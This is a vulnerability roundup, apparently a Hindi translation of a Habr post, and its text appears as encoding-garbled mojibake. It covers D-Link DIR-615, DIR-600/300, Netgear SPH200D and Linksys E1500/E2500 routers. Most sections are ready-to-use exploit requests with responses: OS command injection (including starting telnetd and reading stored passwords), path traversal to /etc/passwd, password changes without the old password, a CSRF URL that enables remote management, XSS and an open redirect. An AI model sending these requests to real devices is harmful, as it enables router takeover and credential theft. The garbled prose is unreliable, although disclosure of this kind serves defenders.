рд╡рд┐рднрд┐рдиреНрди рд░рд╛рдЙрдЯрд░реЛрдВ рдореЗрдВ рдПрдХ рдФрд░ рд╢реВрдиреНрдп-рджрд┐рди рдХреА рдХрдордЬреЛрд░рд┐рдпрд╛рдВ

рдРрд╕рд╛ рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ рд╡рд░реНрд╖ рдХреА рд╢реБрд░реБрдЖрдд рд░реВрдЯрд░реНрд╕ рдХреЗ рдирд┐рд░реНрдорд╛рддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдирд╣реАрдВ рд╣реБрдИред рдмрд╕ рдЖрдЬ, рдореИрдВрдиреЗ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рдпреВрдкреАрдПрдирдкреА рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдкреНрд░реЛрд╕реЗрд╕рд┐рдВрдЧ рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рд╡рд┐рднрд┐рдиреНрди рдирд┐рд░реНрдорд╛рддрд╛рдУрдВ рдХреЗ рд░рд╛рдЙрдЯрд░ рдореЗрдВ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдкрд░ рд╕реВрдЪрдирд╛ рджреАред рдФрд░ рдпрд╣рд╛рдВ рдПрдХ рд╣реА рд╡рд┐рд╖рдп рдкрд░ рд╕рдорд╛рдЪрд╛рд░ рдХрд╛ рдПрдХ рдФрд░ рдЯреБрдХрдбрд╝рд╛ рд╣реИред рдЗрд╕ рдмрд╛рд░, рднреЗрджреНрдпрддрд╛рдПрдВ рдкреВрд░реА рддрд░рд╣ рд╕реЗ рдЕрд▓рдЧ рд╣реИрдВред рдкреНрд░рднрд╛рд╡рд┐рдд рдЙрдкрдХрд░рдг:



рдХрдордЬреЛрд░рд┐рдпрд╛рдБ рдХрд╛рдлреА рдЕрд▓рдЧ рд╣реИрдВ, рд▓реЗрдХрд┐рди рд╡реЗ рдХрдИ рддрдереНрдпреЛрдВ рд╕реЗ рдПрдХрдЬреБрдЯ рд╣реИрдВ: рдПрдХ рд▓реЗрдЦрдХ рдФрд░ рдПрдХ рдкреИрдЪ рдЬрд╛рд░реА рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╡рд┐рдХреНрд░реЗрддрд╛ рдХреА рдЕрдирд┐рдЪреНрдЫрд╛ (рд▓реЗрдЦрдХ рдХреЗ рдЕрдиреБрд╕рд╛рд░)ред

рдбреА рд▓рд┐рдВрдХ рдбреАрдЖрдИрдЖрд░ -615
рдпрд╣ рдЖрд░реЛрдк рд▓рдЧрд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ рдХрд┐ рд╕рдорд╕реНрдпрд╛ 4 рд╕рд┐рддрдВрдмрд░, 2012 рдХреЗ рдлрд░реНрдорд╡реЗрдпрд░ рд╕рдВрд╕реНрдХрд░рдг 8.04, рдФрд░ 18 рдЬрдирд╡рд░реА, 2013 рдХреЗ 8.04 рдореЗрдВ рд╕рдВрд╢реЛрдзрди рдХреА рд╣реИред рд╣рд╛рд▓рд╛рдВрдХрд┐, рдореИрдВ рдЗрди рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдХреЛ рд╡рд┐рдХреНрд░реЗрддрд╛ рдХреА рдЖрдзрд┐рдХрд╛рд░рд┐рдХ рд╡реЗрдмрд╕рд╛рдЗрдЯ рдкрд░ рдирд╣реАрдВ рдЦреЛрдЬ рд╕рдХрд╛ред

рдордирдорд╛рдирд╛ рд░рд╛рдЙрдЯрд░ OS рдЖрджреЗрд╢реЛрдВ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдирд╛


рдПрдХ рдЕрдзрд┐рдХреГрдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ GET рдЕрдиреБрд░реЛрдз рднреЗрдЬрдХрд░ рдбрд┐рд╡рд╛рдЗрд╕ рдкрд░ рдПрдХ рдордирдорд╛рдирд╛ рдЖрджреЗрд╢ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдХрдорд╛рдВрдб ping_ipaddr рдкреИрд░рд╛рдореАрдЯрд░ рдореЗрдВ рдкрд╛рд░рд┐рдд рд╣реЛ рдЬрд╛рдПрдВрдЧреЗ

рдПрдХ рдЙрджрд╛рд╣рд░рдг:

http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr= http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= 


рдХрдорд╛рдВрдб рдХреА рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ HTTP рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдХреЗ рдореБрдЦреНрдп рднрд╛рдЧ рдореЗрдВ рдЖрддреА рд╣реИ:

 HTTP/1.0 200 OK Pragma: no-cache Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <script type="text/javascript" src="common.js.htm"></script> <script language="javascript"> CommJs({init:INC_COMM_PAGE,group:PAGE_GROUP_TOOLS}); var pingResult="Domain"; var pingip="ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown"; <<== var vctinfo= [ {ethport:'0', status:'0', rate:'0', dup:'0'}, {ethport:'1', status:'0', rate:'0', dup:'0'}, {ethport:'2', status:'0', rate:'0', dup:'0'}, 


рд╢рд╛рдпрдж рдХреЛрдИ рдпрд╣ рдкреВрдЫреЗрдЧрд╛: "рдХреНрдпрд╛ рднреЗрджреНрдпрддрд╛ рд╣реИ, рдЕрдЧрд░ рдпрд╣ рдХреЗрд╡рд▓ рдПрдХ рдЕрдзрд┐рдХреГрдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд▓рд┐рдП рд╕рдВрднрд╡ рд╣реИ"? рдореИрдВ рд╕рдордЭрд╛рддрд╛ рд╣реВрдВ: рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рд╕реЛрд╢рд▓ рдЗрдВрдЬреАрдирд┐рдпрд░рд┐рдВрдЧ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рд░рд╛рдЙрдЯрд░ рдХреЗ рдорд╛рд▓рд┐рдХ рдХреЗ рд▓рд┐рдП рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рдЧрдард┐рдд рд▓рд┐рдВрдХ рдХреЛ рдлреЗрдВрдХ рд╕рдХрддрд╛ рд╣реИред

рдЦреБрд▓рд╛рд╕реЗ

рдлреЙрд░реНрдо рдХреЗ рдкрддреЗ рдкрд░ рдЕрдиреБрд░реЛрдз рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
 http://IP_/gconfig.htm 


рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рд╡рд╛рдкрд╕ рдЖ рдЬрд╛рдПрдЧреА:

 var ModelName = 'DIR-615'; var systemName='DLINK-DIR615'; var FunctionList = {HAS_PRIORITY_WEB_ACCOUNT:1,PRIORITY_WEB_ACCOUNT_NUM:1,HAS_IPV6_AUTO_CONFIG:1,DHCPD_HAS_OPTION_66:1,SUPPORT_WPS_DISABLE_PINCODE:1,SUPPORT_IPV6_DSLITE:1,HAS_IPV6_6RD:0,NON_USED:0} 

рдкреБрд░рд╛рдирд╛ рджрд░реНрдЬ рдХрд┐рдП рдмрд┐рдирд╛ рдкрд╛рд╕рд╡рд░реНрдб рдмрджрд▓реЗрдВ


рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╕рд╛рдордЧреНрд░реА рдХреЗ рд╕рд╛рде GET рдЕрдиреБрд░реЛрдз рднреЗрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдкрд░реНрдпрд╛рдкреНрдд рд╣реИ:

 http://IP_/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615 


рдбреА-рд▓рд┐рдВрдХ рдХреЗ рдкреНрд░рддрд┐рдирд┐рдзрд┐рдпреЛрдВ рдХреЛ рд╕реБрд░рдХреНрд╖рд╛ рд╕рдорд╕реНрдпрд╛рдУрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╕реВрдЪрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛, рд▓реЗрдХрд┐рди рдХрд╣рд╛ рдЧрдпрд╛ рдХрд┐ рдХреЛрдИ рдлрд┐рдХреНрд╕ рдирд╣реАрдВ рд╣реЛрдЧрд╛ рдХреНрдпреЛрдВрдХрд┐ рдЙрдирдХреА рд░рд╛рдп рдореЗрдВ, рдпрд╣ рдЙрдирдХреЗ рдЙрдкрдХрд░рдгреЛрдВ рдореЗрдВ рд╕рдорд╕реНрдпрд╛ рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рдЕрдкрдиреЗ рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдореЗрдВ рд╕реНрд╡рдпрдВред


рдбреАрдЖрдИрдЖрд░ -600 / рдбреАрдЖрдИрдЖрд░ 300 - рдПрдЪрдбрдмреНрд▓реНрдпреВ рд░реЗрд╡ рдмреА 1
рдбреАрдЖрдИрдЖрд░ -300 - рдХрдордЬреЛрд░ рд╕рдВрд╕реНрдХрд░рдг:
  • реи.резреи/реи/реирежрезреи
  • 2.13 рджрд┐рдирд╛рдВрдХ 11/07/2012


рдбреАрдЖрдИрдЖрд░ -600 - рдХрдордЬреЛрд░ рд╕рдВрд╕реНрдХрд░рдг:
  • реи.резреи рдмреА режреи рджрд┐рдирд╛рдВрдХ режрез/рез d/реирежрезреи
  • 11/11/2012 рд╕реЗ 2.13b01
  • 2.14b01 рджрд┐рдирд╛рдВрдХ 01/22/2013


рдордирдорд╛рдирд╛ рд░рд╛рдЙрдЯрд░ OS рдЖрджреЗрд╢реЛрдВ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдирд╛


рдПрдХ рдЕрдирдзрд┐рдХреГрдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдбрд┐рд╡рд╛рдЗрд╕ рдкрд░ рдПрдХ рдордирдорд╛рдирд╛ рдЖрджреЗрд╢ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдПрдХ GET рдЕрдиреБрд░реЛрдз рднреЗрдЬрдХрд░ рдЬрд┐рд╕рдореЗрдВ рдХрдорд╛рдВрдб cmd рдкреИрд░рд╛рдореАрдЯрд░ рдореЗрдВ рдкрд╛рд░рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛

рдЙрджрд╛рд╣рд░рдг - рдЯреЗрд▓рдиреЗрдЯ рд╕рд░реНрд╡рд░ рд╢реБрд░реВ рдХрд░рдирд╛

 Request: POST /command.php HTTP/1.1 Host: 192.168.178.222 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.178.222/ Content-Length: 15 Cookie: uid=hfaiGzkB4z Pragma: no-cache Cache-Control: no-cache cmd=telnetd; 


рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рдЬрд╛рдирдХрд╛рд░реА рдХрд╛ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рднрдВрдбрд╛рд░рдг



рдбрд┐рд╡рд╛рдЗрд╕ рдкрд░ рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрд╢рд┐рдВрдЧ рдХреЗ рдмрд┐рдирд╛, рд╕реНрдкрд╖реНрдЯ рдкрд╛рда рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реИрдВ:
 # cat var/passwd "admin" "test" "0" 


рдЖрдк рд╡рд░реНрддрдорд╛рди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рдЗрд╕ рддрд░рд╣ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ:

 root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php "admin" "THESECRETPASS" "0" 


рдЦреБрд▓рд╛рд╕реЗ


рдЕрдиреБрд░реЛрдз рдЯрд╛рдЗрдк рдХрд░реЗрдВ:
 http://Target-IP/DevInfo.txt 


рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рд╡рд╛рдкрд╕ рдЖ рдЬрд╛рдПрдЧреА:

 HTTP/1.1 200 OK Server: Linux, HTTP/1.1, DIR-600 Ver 2.14 Date: Fri, 31 Dec 1999 18:04:13 GMT Content-Length: 267 Firmware External Version: V2.14 Firmware Internal Version: d1mg Model Name: DIR-600 Hardware Version: Bx WLAN Domain: 826 Kernel: 2.6.33.2 Language: en Graphcal Authentication: Disable LAN MAC: <snip> WAN MAC: <snip> WLAN MAC: <snip> 

рдбреА-рд▓рд┐рдВрдХ рдХреЗ рдкреНрд░рддрд┐рдирд┐рдзрд┐рдпреЛрдВ рдХреЛ рд╕реБрд░рдХреНрд╖рд╛ рд╕рдорд╕реНрдпрд╛рдУрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╕реВрдЪрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛, рд▓реЗрдХрд┐рди рдХрд╣рд╛ рдЧрдпрд╛ рдХрд┐ рдХреЛрдИ рдлрд┐рдХреНрд╕ рдирд╣реАрдВ рд╣реЛрдЧрд╛ рдХреНрдпреЛрдВрдХрд┐ рдЙрдирдХреА рд░рд╛рдп рдореЗрдВ, рдпрд╣ рдЙрдирдХреЗ рдЙрдкрдХрд░рдгреЛрдВ рдореЗрдВ рд╕рдорд╕реНрдпрд╛ рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рдЕрдкрдиреЗ рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдореЗрдВ рд╕реНрд╡рдпрдВред



рдиреЗрдЯрдЧрд┐рдпрд░ SPH200D
рдХрдордЬреЛрд░ рдлрд░реНрдорд╡реЗрдпрд░ рд╕рдВрд╕реНрдХрд░рдг:

рдлрд░реНрдорд╡реЗрдпрд░ рд╕рдВрд╕реНрдХрд░рдг: 1.0.4.80
рдХрд░реНрдиреЗрд▓ рд╕рдВрд╕реНрдХрд░рдг: 4.1-18
рд╡реЗрдм рд╕рд░реНрд╡рд░ рд╕рдВрд╕реНрдХрд░рдг: рез.рел

рдбрд┐рд╡рд╛рдЗрд╕ рдкрд░ рдлрд╛рдЗрд▓ рдкрдврд╝рдирд╛



рдПрдХ рдЕрдзрд┐рдХреГрдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдбрд┐рд╡рд╛рдЗрд╕ рдкрд░ рдлрд╛рдЗрд▓реЗрдВ рдкрдврд╝ рд╕рдХрддрд╛ рд╣реИ
 http://IP_/../../etc/passwd 


рдЬреИрд╕реЗ рдХреЛрдИ рдЙрддреНрддрд░ рджреЗрдЧрд╛:
 HTTP/1.0 200 OK Content-type: text/plain Expires: Sat, 24 May 1980.7:00:00.GMT Pragma: no-cache Server: simple httpd 1.0 root:x:0:0:root:/root:/bin/bash demo:x:5000:100:Demo User:/home/demo:/bin/bash nobody:x:65534:65534:Nobody:/htdocs:/bin/bash 


рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛рдПрдБ рдЙрд╕реА рддрд░рд╣ рд╕реЗ рдкрдврд╝реА рдЬрд╛рддреА рд╣реИрдВ:

 /../../var/ HTTP/1.0 200 OK Content-type: text/html Expires: Sat, 24 May 1980.7:00:00.GMT Pragma: no-cache Server: simple httpd 1.0 <H1>Index of ../../var/</H1> <p><a href="/../../var/.">.</a></p> <p><a href="/../../var/..">..</a></p> <p><a href="/../../var/.Skype">.Skype</a></p> <p><a href="/../../var/jffs2">jffs2</a></p> <p><a href="/../../var/htdocs">htdocs</a></p> <p><a href="/../../var/cnxt">cnxt</a></p> <p><a href="/../../var/ppp">ppp</a></p> <p><a href="/../../var/conf">conf</a></p> <p><a href="/../../var/bin">bin</a></p> <p><a href="/../../var/usr">usr</a></p> <p><a href="/../../var/tmp">tmp</a></p> 


рд▓реЗрдХрд┐рди рдХрдм рд╕реЗ рдбрд┐рд╡рд╛рдЗрд╕ рдкрд░ рдЕрдзрд┐рдХреГрдд рд╣реЛрдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИ рдФрд░ рдЕрдиреБрд░реЛрдз рдХрд╛ рдЬрд╡рд╛рдм рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИ - рдпрд╣ рдкреВрд░реА рддрд░рд╣ рд╕реЗ рд╕реНрдкрд╖реНрдЯ рдирд╣реАрдВ рд╣реИ рдХрд┐ рдХреЛрдИ рд╣рдорд▓рд╛рд╡рд░ рдЗрд╕рдХрд╛ рд▓рд╛рдн рдХреИрд╕реЗ рдЙрдард╛ рд╕рдХрддрд╛ рд╣реИ

рдХреНрд░реЙрд╕рд┐рдВрдЧ рд╕реНрдХреНрд░рд┐рдкреНрдЯрд┐рдВрдЧ


рдЫрд╡рд┐

рдПрдХ "рдХрд╛рд░рдЦрд╛рдирд╛" рдЦрд╛рддреЗ рдХреА рдЙрдкрд╕реНрдерд┐рддрд┐


рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ, рдбрд┐рд╡рд╛рдЗрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо: рдкрд╛рд╕рд╡рд░реНрдб рд╕реЗрд╡рд╛: рд╕реЗрд╡рд╛ рдХреЗ рд╕рд╛рде рдПрдХ рдЦрд╛рддрд╛ рд╣реИред рдЬреИрд╕рд╛ рдХрд┐ рдореИрдВ рдЗрд╕реЗ рд╕рдордЭрддрд╛ рд╣реВрдВ, рдирд┐рдпрдорд┐рдд рддрд░реАрдХреЛрдВ рд╕реЗ рдЗрд╕реЗ рдкреНрд░рджрд╛рди рдХрд░рдиреЗ рдХрд╛ рдХреЛрдИ рддрд░реАрдХрд╛ рдирд╣реАрдВ рд╣реИред

рдирд┐рд░реНрдорд╛рддрд╛ рдХреЛ рдЕрдЧрд╕реНрдд 2012 рдореЗрдВ рд╕реБрд░рдХреНрд╖рд╛ рд╕рдорд╕реНрдпрд╛рдУрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╕реВрдЪрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛, рд▓реЗрдХрд┐рди рдЙрд╕рдиреЗ рдХреЛрдИ рдЬрд╡рд╛рдм рдирд╣реАрдВ рджрд┐рдпрд╛ред



Linksys E1500 / E2500
рдХрдордЬреЛрд░ рдлрд░реНрдорд╡реЗрдпрд░ рд╕рдВрд╕реНрдХрд░рдг:
e1500:
  • v1.0.00 - 9-рдлрд░рд╡рд░реА 17, 2011 рдХрд╛ рдирд┐рд░реНрдорд╛рдг
  • v1.0.04 - рдмрд┐рд▓реНрдб 2 - 8 рдорд╛рд░реНрдЪ 2012
  • v1.0.05 - рдирд┐рд░реНрдорд╛рдг 1 - 23 рдЕрдЧрд╕реНрдд, 2012


E2500
  • v1.0.03


рдордирдорд╛рдирд╛ рд░рд╛рдЙрдЯрд░ OS рдЖрджреЗрд╢реЛрдВ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдирд╛


рдПрдХ рдЕрдзрд┐рдХреГрдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ GET рдЕрдиреБрд░реЛрдз рднреЗрдЬрдХрд░ рдбрд┐рд╡рд╛рдЗрд╕ рдкрд░ рдПрдХ рдордирдорд╛рдирд╛ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдХрдорд╛рдВрдб ping_size рдкреИрд░рд╛рдореАрдЯрд░ рдореЗрдВ рдкрд╛рд░рд┐рдд рдХрд┐рдП рдЬрд╛рдПрдВрдЧреЗред

рдПрдХ рдЙрджрд╛рд╣рд░рдг:
 http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip= 


рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдХрд╛ рд╡рд┐рд╕реНрддрд╛рд░


рдПрдХ рдЙрджрд╛рд╣рд░рдг:

 POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 75 submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version 


рдлреЙрд░реНрдо рдХрд╛ рдЬрд╡рд╛рдм рдЖрдПрдЧрд╛:

 HTTP/1.1 200 Ok Server: httpd Date: Thu, 01 Jan 1970 00:00:29 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html Connection: close Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012 


рдкреБрд░рд╛рдирд╛ рджрд░реНрдЬ рдХрд┐рдП рдмрд┐рдирд╛ рдкрд╛рд╕рд╡рд░реНрдб рдмрджрд▓реЗрдВ


рдПрдХ рдЕрдзрд┐рдХреГрдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдбрд┐рд╡рд╛рдЗрд╕ рдореЗрдВ рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рдЙрддреНрдкрдиреНрди POST рдЕрдиреБрд░реЛрдз рднреЗрдЬрдХрд░ рдкрд╛рд╕рд╡рд░реНрдб рдмрджрд▓ рд╕рдХрддрд╛ рд╣реИ:

 POST /apply.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.1.1/Management.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 311 submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 


рдкрд╛рд╕рд╡рд░реНрдб CSRF рд╣рдорд▓рд╛:


 http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 


рдХреНрд░реЙрд╕рд┐рдВрдЧ рд╕реНрдХреНрд░рд┐рдкреНрдЯрд┐рдВрдЧ


 POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 300 submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0 

рдХрд┐рд╕реА рдЕрдиреНрдп рд╕рд╛рдЗрдЯ рдкрд░ рдкреБрдирд░реНрдирд┐рд░реНрджреЗрд╢рд┐рдд рдХрд░реЗрдВ



 POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 290 submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0 




рд╕реНрд░реЛрдд рдХрд╛ рд╕рдВрджрд░реНрдн:

  1. D'Link DIR-600 рдФрд░ DIR-300 (Rev B) рдореЗрдВ рдХрдИ рдХрдордЬреЛрд░рд┐рдпрд╛рдБ
  2. рдбреА'рд▓рд┐рдВрдХ рдбреАрдЖрдИрдЖрд░ -615 рдореЗрдВ рдХрдИ рдХрдордЬреЛрд░рд┐рдпрд╛рдБ
  3. Netgear SPH200D рдореЗрдВ рдХрдИ рдХрдордЬреЛрд░рд┐рдпрд╛рдБ [рдЕрджреНрдпрддрди: 02/03/2013]
  4. Linksys E1500 / E2500 рдореЗрдВ рдПрдХрд╛рдзрд┐рдХ рдХрдордЬреЛрд░рд┐рдпрд╛рдБ

Source: https://habr.com/ru/post/In168683/


All Articles